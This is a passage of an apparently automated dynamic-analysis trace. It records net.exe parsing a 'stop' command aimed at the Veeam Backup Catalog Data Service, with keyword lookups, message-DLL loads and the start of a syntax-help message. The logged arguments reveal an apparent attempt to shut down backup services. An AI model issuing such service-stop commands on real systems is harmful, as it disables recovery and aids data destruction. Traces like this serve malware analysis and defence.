ByteCount=0x10, Buffer=0x2ff884 | out: Buffer=0x2ff884*=0x781cd0) returned 0x0 [0200.321] _fileno (_File=0x74eb2900) returned -2 [0200.321] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0200.321] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0200.321] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0200.321] _wcsicmp (_String1="config", _String2="stop") returned -16 [0200.321] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0200.321] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0200.322] _wcsicmp (_String1="file", _String2="stop") returned -13 [0200.322] _wcsicmp (_String1="files", _String2="stop") returned -13 [0200.322] _wcsicmp (_String1="group", _String2="stop") returned -12 [0200.322] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0200.322] _wcsicmp (_String1="help", _String2="stop") returned -11 [0200.322] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0200.322] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0200.322] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0200.322] _wcsicmp (_String1="session", _String2="stop") returned -15 [0200.322] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0200.322] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0200.322] _wcsicmp (_String1="share", _String2="stop") returned -12 [0200.322] _wcsicmp (_String1="start", _String2="stop") returned -14 [0200.322] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0200.322] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0200.322] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0200.322] _wcsicmp (_String1="accounts", _String2="ΓÇ£Veeam") returned -850 [0200.322] _wcsicmp (_String1="computer", _String2="ΓÇ£Veeam") returned -848 [0200.322] _wcsicmp (_String1="config", _String2="ΓÇ£Veeam") returned -848 [0200.322] _wcsicmp (_String1="continue", _String2="ΓÇ£Veeam") returned -848 [0200.322] _wcsicmp (_String1="cont", _String2="ΓÇ£Veeam") returned -848 [0200.322] _wcsicmp (_String1="file", _String2="ΓÇ£Veeam") returned -845 [0200.322] _wcsicmp (_String1="files", _String2="ΓÇ£Veeam") returned -845 [0200.322] _wcsicmp (_String1="group", _String2="ΓÇ£Veeam") returned -844 [0200.322] _wcsicmp (_String1="groups", _String2="ΓÇ£Veeam") returned -844 [0200.322] _wcsicmp (_String1="help", _String2="ΓÇ£Veeam") returned -843 [0200.322] _wcsicmp (_String1="helpmsg", _String2="ΓÇ£Veeam") returned -843 [0200.322] _wcsicmp (_String1="localgroup", _String2="ΓÇ£Veeam") returned -839 [0200.323] _wcsicmp (_String1="pause", _String2="ΓÇ£Veeam") returned -835 [0200.323] _wcsicmp (_String1="session", _String2="ΓÇ£Veeam") returned -832 [0200.323] _wcsicmp (_String1="sessions", _String2="ΓÇ£Veeam") returned -832 [0200.323] _wcsicmp (_String1="sess", _String2="ΓÇ£Veeam") returned -832 [0200.323] _wcsicmp (_String1="share", _String2="ΓÇ£Veeam") returned -832 [0200.323] _wcsicmp (_String1="start", _String2="ΓÇ£Veeam") returned -832 [0200.323] _wcsicmp (_String1="stats", _String2="ΓÇ£Veeam") returned -832 [0200.323] _wcsicmp (_String1="statistics", _String2="ΓÇ£Veeam") returned -832 [0200.323] _wcsicmp (_String1="stop", _String2="ΓÇ£Veeam") returned -832 [0200.323] _wcsicmp (_String1="time", _String2="ΓÇ£Veeam") returned -831 [0200.323] _wcsicmp (_String1="user", _String2="ΓÇ£Veeam") returned -830 [0200.323] _wcsicmp (_String1="users", _String2="ΓÇ£Veeam") returned -830 [0200.323] _wcsicmp (_String1="msg", _String2="ΓÇ£Veeam") returned -838 [0200.323] _wcsicmp (_String1="messenger", _String2="ΓÇ£Veeam") returned -838 [0200.323] _wcsicmp (_String1="receiver", _String2="ΓÇ£Veeam") returned -833 [0200.323] _wcsicmp (_String1="rcv", _String2="ΓÇ£Veeam") returned -833 [0200.323] _wcsicmp (_String1="netpopup", _String2="ΓÇ£Veeam") returned -837 [0200.323] _wcsicmp (_String1="redirector", _String2="ΓÇ£Veeam") returned -833 [0200.323] _wcsicmp (_String1="redir", _String2="ΓÇ£Veeam") returned -833 [0200.323] _wcsicmp (_String1="rdr", _String2="ΓÇ£Veeam") returned -833 [0200.323] _wcsicmp (_String1="workstation", _String2="ΓÇ£Veeam") returned -828 [0200.323] _wcsicmp (_String1="work", _String2="ΓÇ£Veeam") returned -828 [0200.323] _wcsicmp (_String1="wksta", _String2="ΓÇ£Veeam") returned -828 [0200.323] _wcsicmp (_String1="prdr", _String2="ΓÇ£Veeam") returned -835 [0200.323] _wcsicmp (_String1="devrdr", _String2="ΓÇ£Veeam") returned -847 [0200.323] _wcsicmp (_String1="lanmanworkstation", _String2="ΓÇ£Veeam") returned -839 [0200.323] _wcsicmp (_String1="server", _String2="ΓÇ£Veeam") returned -832 [0200.323] _wcsicmp (_String1="svr", _String2="ΓÇ£Veeam") returned -832 [0200.323] _wcsicmp (_String1="srv", _String2="ΓÇ£Veeam") returned -832 [0200.323] _wcsicmp (_String1="lanmanserver", _String2="ΓÇ£Veeam") returned -839 [0200.323] _wcsicmp (_String1="alerter", _String2="ΓÇ£Veeam") returned -850 [0200.323] _wcsicmp (_String1="netlogon", _String2="ΓÇ£Veeam") returned -837 [0200.324] _wcsicmp (_String1="accounts", _String2="Backup") returned -1 [0200.324] _wcsicmp (_String1="computer", _String2="Backup") returned 1 [0200.324] _wcsicmp (_String1="config", _String2="Backup") returned 1 [0200.324] _wcsicmp (_String1="continue", _String2="Backup") returned 1 [0200.324] _wcsicmp (_String1="cont", _String2="Backup") returned 1 [0200.324] _wcsicmp (_String1="file", _String2="Backup") returned 4 [0200.324] _wcsicmp (_String1="files", _String2="Backup") returned 4 [0200.324] _wcsicmp (_String1="group", _String2="Backup") returned 5 [0200.324] _wcsicmp (_String1="groups", _String2="Backup") returned 5 [0200.324] _wcsicmp (_String1="help", _String2="Backup") returned 6 [0200.324] _wcsicmp (_String1="helpmsg", _String2="Backup") returned 6 [0200.324] _wcsicmp (_String1="localgroup", _String2="Backup") returned 10 [0200.324] _wcsicmp (_String1="pause", _String2="Backup") returned 14 [0200.324] _wcsicmp (_String1="session", _String2="Backup") returned 17 [0200.324] _wcsicmp (_String1="sessions", _String2="Backup") returned 17 [0200.324] _wcsicmp (_String1="sess", _String2="Backup") returned 17 [0200.324] _wcsicmp (_String1="share", _String2="Backup") returned 17 [0200.324] _wcsicmp (_String1="start", _String2="Backup") returned 17 [0200.324] _wcsicmp (_String1="stats", _String2="Backup") returned 17 [0200.324] _wcsicmp (_String1="statistics", _String2="Backup") returned 17 [0200.324] _wcsicmp (_String1="stop", _String2="Backup") returned 17 [0200.324] _wcsicmp (_String1="time", _String2="Backup") returned 18 [0200.324] _wcsicmp (_String1="user", _String2="Backup") returned 19 [0200.324] _wcsicmp (_String1="users", _String2="Backup") returned 19 [0200.324] _wcsicmp (_String1="msg", _String2="Backup") returned 11 [0200.324] _wcsicmp (_String1="messenger", _String2="Backup") returned 11 [0200.324] _wcsicmp (_String1="receiver", _String2="Backup") returned 16 [0200.324] _wcsicmp (_String1="rcv", _String2="Backup") returned 16 [0200.324] _wcsicmp (_String1="netpopup", _String2="Backup") returned 12 [0200.324] _wcsicmp (_String1="redirector", _String2="Backup") returned 16 [0200.324] _wcsicmp (_String1="redir", _String2="Backup") returned 16 [0200.324] _wcsicmp (_String1="rdr", _String2="Backup") returned 16 [0200.324] _wcsicmp (_String1="workstation", _String2="Backup") returned 21 [0200.324] _wcsicmp (_String1="work", _String2="Backup") returned 21 [0200.324] _wcsicmp (_String1="wksta", _String2="Backup") returned 21 [0200.324] _wcsicmp (_String1="prdr", _String2="Backup") returned 14 [0200.324] _wcsicmp (_String1="devrdr", _String2="Backup") returned 2 [0200.325] _wcsicmp (_String1="lanmanworkstation", _String2="Backup") returned 10 [0200.325] _wcsicmp (_String1="server", _String2="Backup") returned 17 [0200.325] _wcsicmp (_String1="svr", _String2="Backup") returned 17 [0200.325] _wcsicmp (_String1="srv", _String2="Backup") returned 17 [0200.325] _wcsicmp (_String1="lanmanserver", _String2="Backup") returned 10 [0200.325] _wcsicmp (_String1="alerter", _String2="Backup") returned -1 [0200.325] _wcsicmp (_String1="netlogon", _String2="Backup") returned 12 [0200.325] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0200.325] SetThreadUILanguage (LangId=0x0) returned 0x409 [0200.325] wcscpy_s (in: _Destination=0x2ff384, _SizeInWords=0xf, _Source="neth.dll" | out: _Destination="neth.dll") returned 0x0 [0200.325] LoadLibraryW (lpLibFileName="neth.dll") returned 0x74a10000 [0200.326] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc66, dwLanguageId=0x0, lpBuffer=0x2ff380, nSize=0x0, Arguments=0x2ff37c | out: lpBuffer="嚈xneth.dll") returned 0xff [0200.327] wcstok (in: _String="CONTINUE: CONT$\r\nFILE: FILES$\r\nGROUP: GROUPS$\r\nREPLICATOR: REPL, REPLICATOR$\r\nSESSION: SESSIONS, SESS$\r\nSTATISTICS: STATS$\r\nUSER: USERS$\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR$\r\nSERVER: SVR, SRV$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="CONTINUE: CONT", _Context=0x3d6) returned="CONTINUE: CONT" [0200.327] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nFILE: FILES" [0200.327] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nGROUP: GROUPS" [0200.327] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nREPLICATOR: REPL, REPLICATOR" [0200.327] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSESSION: SESSIONS, SESS" [0200.327] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSTATISTICS: STATS" [0200.327] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nUSER: USERS" [0200.327] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR" [0200.328] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVER: SVR, SRV" [0200.328] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0200.328] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0200.328] wcstok (in: _String="CONTINUE: CONT", _Delimiter=":,$", _Context=0x3d6 | out: _String="CONTINUE", _Context=0x3d6) returned="CONTINUE" [0200.328] wcsspn (_String="CONTINUE", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0200.328] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" CONT" [0200.328] wcsspn (_String=" CONT", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0200.328] _wcsicmp (_String1="CONT", _String2="stop") returned -16 [0200.328] _wcsicmp (_String1="CONT", _String2="ΓÇ£Veeam") returned -848 [0200.328] _wcsicmp (_String1="CONT", _String2="Backup") returned 1 [0200.328] _wcsicmp (_String1="CONT", _String2="Catalog") returned 14 [0200.328] _wcsicmp (_String1="CONT", _String2="Data") returned -1 [0200.328] _wcsicmp (_String1="CONT", _String2="ServiceΓÇ¥") returned -16 [0200.328] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0200.328] wcstok (in: _String="\r\nFILE: FILES", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nFILE", _Context=0x3d6) returned="\r\nFILE" [0200.328] wcsspn (_String="\r\nFILE", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0200.328] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" FILES" [0200.328] wcsspn (_String=" FILES", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0200.328] _wcsicmp (_String1="FILES", _String2="stop") returned -13 [0200.328] _wcsicmp (_String1="FILES", _String2="ΓÇ£Veeam") returned -845 [0200.328] _wcsicmp (_String1="FILES", _String2="Backup") returned 4 [0200.328] _wcsicmp (_String1="FILES", _String2="Catalog") returned 3 [0200.328] _wcsicmp (_String1="FILES", _String2="Data") returned 2 [0200.328] _wcsicmp (_String1="FILES", _String2="ServiceΓÇ¥") returned -13 [0200.328] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0200.328] wcstok (in: _String="\r\nGROUP: GROUPS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nGROUP", _Context=0x3d6) returned="\r\nGROUP" [0200.328] wcsspn (_String="\r\nGROUP", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0200.328] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" GROUPS" [0200.328] wcsspn (_String=" GROUPS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0200.328] _wcsicmp (_String1="GROUPS", _String2="stop") returned -12 [0200.328] _wcsicmp (_String1="GROUPS", _String2="ΓÇ£Veeam") returned -844 [0200.328] _wcsicmp (_String1="GROUPS", _String2="Backup") returned 5 [0200.328] _wcsicmp (_String1="GROUPS", _String2="Catalog") returned 4 [0200.328] _wcsicmp (_String1="GROUPS", _String2="Data") returned 3 [0200.328] _wcsicmp (_String1="GROUPS", _String2="ServiceΓÇ¥") returned -12 [0200.328] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0200.329] wcstok (in: _String="\r\nREPLICATOR: REPL, REPLICATOR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nREPLICATOR", _Context=0x3d6) returned="\r\nREPLICATOR" [0200.329] wcsspn (_String="\r\nREPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0200.329] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPL" [0200.329] wcsspn (_String=" REPL", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0200.329] _wcsicmp (_String1="REPL", _String2="stop") returned -1 [0200.329] _wcsicmp (_String1="REPL", _String2="ΓÇ£Veeam") returned -833 [0200.329] _wcsicmp (_String1="REPL", _String2="Backup") returned 16 [0200.329] _wcsicmp (_String1="REPL", _String2="Catalog") returned 15 [0200.329] _wcsicmp (_String1="REPL", _String2="Data") returned 14 [0200.329] _wcsicmp (_String1="REPL", _String2="ServiceΓÇ¥") returned -1 [0200.329] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPLICATOR" [0200.329] wcsspn (_String=" REPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0200.329] _wcsicmp (_String1="REPLICATOR", _String2="stop") returned -1 [0200.329] _wcsicmp (_String1="REPLICATOR", _String2="ΓÇ£Veeam") returned -833 [0200.329] _wcsicmp (_String1="REPLICATOR", _String2="Backup") returned 16 [0200.329] _wcsicmp (_String1="REPLICATOR", _String2="Catalog") returned 15 [0200.329] _wcsicmp (_String1="REPLICATOR", _String2="Data") returned 14 [0200.329] _wcsicmp (_String1="REPLICATOR", _String2="ServiceΓÇ¥") returned -1 [0200.329] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0200.329] wcstok (in: _String="\r\nSESSION: SESSIONS, SESS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSESSION", _Context=0x3d6) returned="\r\nSESSION" [0200.329] wcsspn (_String="\r\nSESSION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0200.329] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESSIONS" [0200.329] wcsspn (_String=" SESSIONS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0200.329] _wcsicmp (_String1="SESSIONS", _String2="stop") returned -15 [0200.329] _wcsicmp (_String1="SESSIONS", _String2="ΓÇ£Veeam") returned -832 [0200.329] _wcsicmp (_String1="SESSIONS", _String2="Backup") returned 17 [0200.329] _wcsicmp (_String1="SESSIONS", _String2="Catalog") returned 16 [0200.329] _wcsicmp (_String1="SESSIONS", _String2="Data") returned 15 [0200.329] _wcsicmp (_String1="SESSIONS", _String2="ServiceΓÇ¥") returned 1 [0200.329] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESS" [0200.329] wcsspn (_String=" SESS", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0200.329] _wcsicmp (_String1="SESS", _String2="stop") returned -15 [0200.329] _wcsicmp (_String1="SESS", _String2="ΓÇ£Veeam") returned -832 [0200.329] _wcsicmp (_String1="SESS", _String2="Backup") returned 17 [0200.329] _wcsicmp (_String1="SESS", _String2="Catalog") returned 16 [0200.329] _wcsicmp (_String1="SESS", _String2="Data") returned 15 [0200.329] _wcsicmp (_String1="SESS", _String2="ServiceΓÇ¥") returned 1 [0200.330] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0200.330] wcstok (in: _String="\r\nSTATISTICS: STATS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSTATISTICS", _Context=0x3d6) returned="\r\nSTATISTICS" [0200.330] wcsspn (_String="\r\nSTATISTICS", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0200.330] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" STATS" [0200.330] wcsspn (_String=" STATS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0200.330] _wcsicmp (_String1="STATS", _String2="stop") returned -14 [0200.330] _wcsicmp (_String1="STATS", _String2="ΓÇ£Veeam") returned -832 [0200.330] _wcsicmp (_String1="STATS", _String2="Backup") returned 17 [0200.330] _wcsicmp (_String1="STATS", _String2="Catalog") returned 16 [0200.330] _wcsicmp (_String1="STATS", _String2="Data") returned 15 [0200.330] _wcsicmp (_String1="STATS", _String2="ServiceΓÇ¥") returned 15 [0200.330] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0200.330] wcstok (in: _String="\r\nUSER: USERS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nUSER", _Context=0x3d6) returned="\r\nUSER" [0200.330] wcsspn (_String="\r\nUSER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0200.330] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" USERS" [0200.330] wcsspn (_String=" USERS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0200.330] _wcsicmp (_String1="USERS", _String2="stop") returned 2 [0200.330] _wcsicmp (_String1="USERS", _String2="ΓÇ£Veeam") returned -830 [0200.330] _wcsicmp (_String1="USERS", _String2="Backup") returned 19 [0200.330] _wcsicmp (_String1="USERS", _String2="Catalog") returned 18 [0200.330] _wcsicmp (_String1="USERS", _String2="Data") returned 17 [0200.330] _wcsicmp (_String1="USERS", _String2="ServiceΓÇ¥") returned 2 [0200.330] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0200.330] wcstok (in: _String="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nWORKSTATION", _Context=0x3d6) returned="\r\nWORKSTATION" [0200.330] wcsspn (_String="\r\nWORKSTATION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0200.330] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIRECTOR" [0200.330] wcsspn (_String=" REDIRECTOR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0200.330] _wcsicmp (_String1="REDIRECTOR", _String2="stop") returned -1 [0200.330] _wcsicmp (_String1="REDIRECTOR", _String2="ΓÇ£Veeam") returned -833 [0200.330] _wcsicmp (_String1="REDIRECTOR", _String2="Backup") returned 16 [0200.330] _wcsicmp (_String1="REDIRECTOR", _String2="Catalog") returned 15 [0200.330] _wcsicmp (_String1="REDIRECTOR", _String2="Data") returned 14 [0200.330] _wcsicmp (_String1="REDIRECTOR", _String2="ServiceΓÇ¥") returned -1 [0200.330] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIR" [0200.330] wcsspn (_String=" REDIR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0200.330] _wcsicmp (_String1="REDIR", _String2="stop") returned -1 [0200.330] _wcsicmp (_String1="REDIR", _String2="ΓÇ£Veeam") returned -833 [0200.331] _wcsicmp (_String1="REDIR", _String2="Backup") returned 16 [0200.331] _wcsicmp (_String1="REDIR", _String2="Catalog") returned 15 [0200.331] _wcsicmp (_String1="REDIR", _String2="Data") returned 14 [0200.331] _wcsicmp (_String1="REDIR", _String2="ServiceΓÇ¥") returned -1 [0200.331] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" RDR" [0200.331] wcsspn (_String=" RDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0200.331] _wcsicmp (_String1="RDR", _String2="stop") returned -1 [0200.331] _wcsicmp (_String1="RDR", _String2="ΓÇ£Veeam") returned -833 [0200.331] _wcsicmp (_String1="RDR", _String2="Backup") returned 16 [0200.331] _wcsicmp (_String1="RDR", _String2="Catalog") returned 15 [0200.331] _wcsicmp (_String1="RDR", _String2="Data") returned 14 [0200.331] _wcsicmp (_String1="RDR", _String2="ServiceΓÇ¥") returned -1 [0200.331] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WORK" [0200.331] wcsspn (_String=" WORK", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0200.331] _wcsicmp (_String1="WORK", _String2="stop") returned 4 [0200.331] _wcsicmp (_String1="WORK", _String2="ΓÇ£Veeam") returned -828 [0200.331] _wcsicmp (_String1="WORK", _String2="Backup") returned 21 [0200.331] _wcsicmp (_String1="WORK", _String2="Catalog") returned 20 [0200.331] _wcsicmp (_String1="WORK", _String2="Data") returned 19 [0200.331] _wcsicmp (_String1="WORK", _String2="ServiceΓÇ¥") returned 4 [0200.331] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WKSTA" [0200.331] wcsspn (_String=" WKSTA", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0200.331] _wcsicmp (_String1="WKSTA", _String2="stop") returned 4 [0200.331] _wcsicmp (_String1="WKSTA", _String2="ΓÇ£Veeam") returned -828 [0200.331] _wcsicmp (_String1="WKSTA", _String2="Backup") returned 21 [0200.331] _wcsicmp (_String1="WKSTA", _String2="Catalog") returned 20 [0200.331] _wcsicmp (_String1="WKSTA", _String2="Data") returned 19 [0200.331] _wcsicmp (_String1="WKSTA", _String2="ServiceΓÇ¥") returned 4 [0200.331] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" PRDR" [0200.331] wcsspn (_String=" PRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0200.331] _wcsicmp (_String1="PRDR", _String2="stop") returned -3 [0200.331] _wcsicmp (_String1="PRDR", _String2="ΓÇ£Veeam") returned -835 [0200.331] _wcsicmp (_String1="PRDR", _String2="Backup") returned 14 [0200.331] _wcsicmp (_String1="PRDR", _String2="Catalog") returned 13 [0200.331] _wcsicmp (_String1="PRDR", _String2="Data") returned 12 [0200.331] _wcsicmp (_String1="PRDR", _String2="ServiceΓÇ¥") returned -3 [0200.331] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" DEVRDR" [0200.332] wcsspn (_String=" DEVRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0200.332] _wcsicmp (_String1="DEVRDR", _String2="stop") returned -15 [0200.332] _wcsicmp (_String1="DEVRDR", _String2="ΓÇ£Veeam") returned -847 [0200.332] _wcsicmp (_String1="DEVRDR", _String2="Backup") returned 2 [0200.332] _wcsicmp (_String1="DEVRDR", _String2="Catalog") returned 1 [0200.332] _wcsicmp (_String1="DEVRDR", _String2="Data") returned 4 [0200.332] _wcsicmp (_String1="DEVRDR", _String2="ServiceΓÇ¥") returned -15 [0200.332] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0200.332] wcstok (in: _String="\r\nSERVER: SVR, SRV", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSERVER", _Context=0x3d6) returned="\r\nSERVER" [0200.332] wcsspn (_String="\r\nSERVER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0200.332] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SVR" [0200.332] wcsspn (_String=" SVR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0200.332] _wcsicmp (_String1="SVR", _String2="stop") returned 2 [0200.332] _wcsicmp (_String1="SVR", _String2="ΓÇ£Veeam") returned -832 [0200.332] _wcsicmp (_String1="SVR", _String2="Backup") returned 17 [0200.332] _wcsicmp (_String1="SVR", _String2="Catalog") returned 16 [0200.332] _wcsicmp (_String1="SVR", _String2="Data") returned 15 [0200.332] _wcsicmp (_String1="SVR", _String2="ServiceΓÇ¥") returned 17 [0200.332] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SRV" [0200.332] wcsspn (_String=" SRV", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0200.332] _wcsicmp (_String1="SRV", _String2="stop") returned -2 [0200.332] _wcsicmp (_String1="SRV", _String2="ΓÇ£Veeam") returned -832 [0200.332] _wcsicmp (_String1="SRV", _String2="Backup") returned 17 [0200.332] _wcsicmp (_String1="SRV", _String2="Catalog") returned 16 [0200.332] _wcsicmp (_String1="SRV", _String2="Data") returned 15 [0200.332] _wcsicmp (_String1="SRV", _String2="ServiceΓÇ¥") returned 13 [0200.332] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0200.332] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc67, dwLanguageId=0x0, lpBuffer=0x2ff380, nSize=0x0, Arguments=0x2ff37c | out: lpBuffer="㽘xꔺ瓡") returned 0x1c [0200.332] wcstok (in: _String="NAMES$\r\nSYNTAX$\r\nSERVICES$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="NAMES", _Context=0x3d6) returned="NAMES" [0200.332] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSYNTAX" [0200.332] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVICES" [0200.332] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0200.332] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0200.332] wcsspn (_String="NAMES", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0200.332] _wcsicmp (_String1="stop", _String2="NAMES") returned 5 [0200.332] wcsspn (_String="\r\nSYNTAX", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0200.333] _wcsicmp (_String1="stop", _String2="SYNTAX") returned -5 [0200.333] wcsspn (_String="\r\nSERVICES", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0200.333] _wcsicmp (_String1="stop", _String2="SERVICES") returned 15 [0200.333] wcscpy_s (in: _Destination=0x57a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0200.333] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a00000 [0200.334] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a00000, dwMessageId=0x111d, dwLanguageId=0x0, lpBuffer=0x57b338, nSize=0x800, Arguments=0x579dd8 | out: lpBuffer="The syntax of this command is:\r\n") returned 0x20 [0200.334] GetFileType (hFile=0x26c) returned 0x3 [0200.334] LocalAlloc (uFlags=0x0, uBytes=0x40) returned 0x784228 [0200.334] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The syntax of this command is:\r\n", cchWideChar=32, lpMultiByteStr=0x784228, cbMultiByte=64, lpDefaultChar=0x0, 